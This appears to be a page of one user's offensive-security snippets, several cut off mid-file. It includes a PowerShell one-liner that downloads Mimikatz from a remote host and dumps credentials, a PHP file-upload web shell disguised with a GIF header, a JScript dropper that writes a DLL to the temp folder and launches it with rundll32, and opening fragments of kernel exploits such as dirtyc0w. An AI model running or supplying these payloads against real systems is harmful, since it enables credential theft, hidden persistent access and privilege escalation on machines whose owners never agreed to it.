ivanvza

powershell "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/<mimikatz location>'); Invoke-Mimikatz -DumpCreds"
---
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

ivanvza

Some sites, make use of a file upload feature. 

This has happed to me where I know about the upload, but for whatever reason I can not access/execute it.
So by knowing the upload path, example: scripts/upload.php, I can just add the below HTML (e.g. via burpsuite) when the server responds with the HTML.

<link href="http://hayageek.github.io/jQuery-Upload-File/4.0.10/uploadfile.css" rel="stylesheet">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script src="http://hayageek.github.io/jQuery-Upload-File/4.0.10/jquery.uploadfile.min.js">

</script>

ivanvza

GIF89aü%÷\u20ac\u20ac\u20ac\u20ac\u20ac\u20ac\u20ac\u20ac\u20ac\u20ac\u20ac
<center><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></center>
<?php if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Done !!'; } else { echo 'Failed :('; }} 
echo "<center><br><b>".php_uname()."</b><br></center>";
echo "<center><p><br><b>".getcwd()."</b><br></p></center>";
?>

ivanvza

;The MIT License (MIT)
  
;Copyright (c) 2017 Robert L. Taylor
  
;Permission is hereby granted, free of charge, to any person obtaining a 
;copy of this software and associated documentation files (the “Software”), 
;to deal in the Software without restriction, including without limitation 
;the rights to use, copy, modify, merge, publish, distribute, sublicense, 
;and/or sell copies of the Software, and to permit persons to whom the 
;Software is furnished to do so, subject to the following conditions:

ivanvza

urls = ["http://<IP HERE>"]

var wscript = WScript["CreateObject"]("WScript.Shell");
var wscript_env = wscript.ExpandEnvironmentStrings("%T" + "EMP%/");
var dll = wscript_env + "jEiwaeU3NSUv";
var dll_filename = dll + ".d" + "ll";
var system_arch = wscript.Environment("System");

if (system_arch("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64") {
    var rundll_arch_patch = wscript.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\rundll32.exe");

ivanvza

// clang -O3 -o task_nicely_t task_nicely_t.c

/*
task_t considered harmful

TL;DR
you cannot hold or use a task struct pointer and expect the euid of that task to stay the same.
Many many places in the kernel do this and there are a great many very exploitable bugs as a result.

********

ivanvza

#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
  
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/mman.h>
  

ivanvza

#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <netdb.h>
#include <string.h>
int create_tcp_socket();
char *get_ip(char *host);
char *build_get_query(char *host, char *page);
void usage();

ivanvza

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

# USAGE:
# ~$ export PWN='echo 1'
# ~$ ./getenvaddr PWN ./pwnme
# PWN will be at 0xbfffff7d

int main(int argc, char *argv[]) {

ivanvza

/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -lpthread dirtyc0w.c -o dirtyc0w